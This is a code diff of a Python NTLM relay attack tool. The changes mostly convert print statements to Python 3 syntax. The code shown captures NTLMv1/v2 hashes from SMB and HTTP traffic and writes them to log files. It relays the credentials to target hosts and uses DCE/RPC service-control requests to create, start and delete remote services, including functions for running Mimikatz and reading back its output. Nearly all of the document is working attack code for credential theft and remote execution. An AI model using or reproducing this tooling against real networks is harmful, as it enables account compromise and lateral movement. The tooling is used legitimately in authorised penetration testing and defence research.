@ -75,7 +75,7 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
with open(Logs_Path+"logs/"+Outfile,"r") as filestr: with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure" Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
if re.search(Login.encode('hex'), filestr.read().encode('hex')): if re.search(Login.encode('hex'), filestr.read().encode('hex')):
print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User) print ("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User))
return True return True
else: else:
@ -84,12 +84,12 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd):
raise raise
def ServeOPTIONS(data): def ServeOPTIONS(data):
WebDav= re.search('OPTIONS', data) WebDav= re.search('OPTIONS', data)
if WebDav: if WebDav:
Buffer = WEBDAV_Options_Answer() Buffer = WEBDAV_Options_Answer()
return str(Buffer) return str(Buffer)
return False return False
def IsSMBAnonymous(data): def IsSMBAnonymous(data):
SSPIStart = data.find('NTLMSSP') SSPIStart = data.find('NTLMSSP')
@ -101,168 +101,168 @@ def IsSMBAnonymous(data):
return False return False
def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting): def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting):
LMhashLen = struct.unpack('<H',data[12:14])[0] LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0] LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24: NthashLen = struct.unpack('<H',data[20:22])[0]
HostNameLen = struct.unpack('<H',data[46:48])[0] NthashOffset = struct.unpack('<H',data[24:26])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex")) UserLen = struct.unpack('<H',data[36:38])[0]
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User) UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail." )
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if ('!' + User) in UserToRelay: if ('!' + User) in UserToRelay:
print "[+] Username: %s is blacklisted, dropping connection." % User print ("[+] Username: %s is blacklisted, dropping connection." % User)
return None, None return None, None
elif User in UserToRelay or "ALL" in UserToRelay: elif User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return User, Domain return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User) print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, User, HostName, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return User, HostName return User, HostName
else: else:
print "[+] Username: %s not in target list, dropping connection."%(User) print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None return None, None
if NthashLen > 24: if NthashLen > 24:
DomainLen = struct.unpack('<H',data[28:30])[0] DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0] DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','') Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0] HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','') HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:]) WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User) WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if User in UserToRelay or "ALL" in UserToRelay: if User in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return User, Domain return User, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(User) print ("[+] Username: %s is whitelisted, forwarding credentials."%(User))
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, User, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return User, Domain return User, Domain
else: else:
print "[+] Username: %s not in target list, dropping connection."%(User) print ("[+] Username: %s not in target list, dropping connection."%(User))
return None, None return None, None
def ParseSMBHash(data,client, challenge,UserToRelay,Host,Pivoting): #Parse SMB NTLMSSP v1/v2 def ParseSMBHash(data,client, challenge,UserToRelay,Host,Pivoting): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP') SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:] SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0] LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0] LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0] NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0] NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24: if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0] DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0] DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE') Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0] UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0] UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE') Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex")) WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username) WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay: if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Username, Domain return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username) print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return Username, Domain return Username, Domain
else: else:
print "[+] Username: %s not in target list, dropping connection."%(Username) print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None return None, None
if NthashLen > 60: if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0] DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0] DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE') Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0] UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0] UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE') Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:]) WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username) WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host: if client == Host:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail." print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else: else:
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))) print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay: if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Username, Domain return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username) print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None): if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts. ##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None return None, None
else: else:
return Username, Domain return Username, Domain
else: else:
print "[+] Username: %s not in target list, dropping connection."%(Username) print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None return None, None
#Get the index of the dialect we want. That is NT LM 0.12. #Get the index of the dialect we want. That is NT LM 0.12.
def Parse_Nego_Dialect(data): def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]]) Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16): for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12': if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00' return chr(i) + '\x00'
def ExtractSMBChallenge(data, Pivoting): def ExtractSMBChallenge(data, Pivoting):
SSPIStart = data.find('NTLMSSP') SSPIStart = data.find('NTLMSSP')
@ -271,7 +271,7 @@ def ExtractSMBChallenge(data, Pivoting):
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Challenge return Challenge
else: else:
print "[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex") print ("[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex"))
return Challenge return Challenge
def ExtractHTTPChallenge(data,Pivoting): def ExtractHTTPChallenge(data,Pivoting):
@ -283,7 +283,7 @@ def ExtractHTTPChallenge(data,Pivoting):
if Pivoting[0] == "1": if Pivoting[0] == "1":
return Challenge return Challenge
else: else:
print "[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex") print ("[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex"))
return Challenge return Challenge
#Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target. #Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target.
@ -296,7 +296,7 @@ def ExtractRawNTLMPacket(data):
#Is this a Guest sessions? #Is this a Guest sessions?
def GetSessionResponseFlags(data): def GetSessionResponseFlags(data):
if data[41:43] == "\x01\x00": if data[41:43] == "\x01\x00":
print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.." print ("[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful..")
#Keeps our connection alive. #Keeps our connection alive.
def SMBKeepAlive(s, data): def SMBKeepAlive(s, data):
@ -344,7 +344,7 @@ def FindLocalIp():
IP = s.getsockname()[0] IP = s.getsockname()[0]
s.close() s.close()
except: except:
print "It seems like you're not connected to any network.." print ("It seems like you're not connected to any network..")
IP = '127.0.0.1' IP = '127.0.0.1'
s.close() s.close()
return IP return IP
@ -364,7 +364,7 @@ def ConvertToClassC(Host, Class):
Ip[6:7] = ["0"] Ip[6:7] = ["0"]
return ''.join(Ip)+Class return ''.join(Ip)+Class
else: else:
print "Illegal class, please use: /24 or /16" print ("Illegal class, please use: /24 or /16")
return None return None
def GenerateRandomFileName(): def GenerateRandomFileName():
@ -510,7 +510,7 @@ def BindCall(UID, Version, File, data, s):
## Fail Handling. ## Fail Handling.
if data[8:10] == "\xa2\x22": if data[8:10] == "\xa2\x22":
print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n" print ("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## Fail Handling. ## Fail Handling.
@ -582,14 +582,14 @@ def MimiKatzRPC(Command, f, host, data, s):
#First Packet from output contains the complete len of what's coming, don't print it. #First Packet from output contains the complete len of what's coming, don't print it.
LenOut = len(ExtractRPCCommandOutput(data)) LenOut = len(ExtractRPCCommandOutput(data))
Output = ExtractRPCCommandOutput(data)[12:LenOut-9] Output = ExtractRPCCommandOutput(data)[12:LenOut-9]
print Output print (Output)
return data,s,f return data,s,f
##Do large RPC reads.. ##Do large RPC reads..
if data[8:10] == "\x2e\x05": if data[8:10] == "\x2e\x05":
buffsize = 1024 buffsize = 1024
filesize = struct.unpack('<i', data[96:100])[0]*2 filesize = struct.unpack('<i', data[96:100])[0]*2
print 'File size: %s'%(GetReadableSize(filesize)) print ('File size: %s'%(GetReadableSize(filesize)))
dataoffset = 0 dataoffset = 0
start_time = time.time() start_time = time.time()
##First Packet from output contains the complete len of what's coming, don't print it. ##First Packet from output contains the complete len of what's coming, don't print it.
@ -617,10 +617,10 @@ def MimiKatzRPC(Command, f, host, data, s):
Seconds = (time.time() - start_time) Seconds = (time.time() - start_time)
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Fetched in: %.3g minutes.'%(minutes) print ('Fetched in: %.3g minutes.'%(minutes))
if Seconds<60: if Seconds<60:
print 'Fetched in: %.3g seconds'%(Seconds) print ('Fetched in: %.3g seconds'%(Seconds))
print "Output:\n", Output print ("Output:\n", Output)
return data,s,f return data,s,f
###################################### ######################################
@ -643,7 +643,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC Create Service. ## DCE/RPC Create Service.
@ -660,12 +660,12 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
#print "[+] Creating service" #print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[88:108] ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -683,7 +683,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -700,7 +700,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -720,7 +720,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -754,13 +754,13 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -778,7 +778,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLControlService, stop operation. ## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -795,7 +795,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLDeleteService. ## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n" print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -811,7 +811,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n" print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -846,7 +846,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC Create Service. ## DCE/RPC Create Service.
@ -863,12 +863,12 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
buffer1 = longueur(packet0)+packet0 buffer1 = longueur(packet0)+packet0
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
#print "[+] Creating service" #print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[88:108] ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -886,7 +886,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -903,7 +903,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -923,7 +923,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
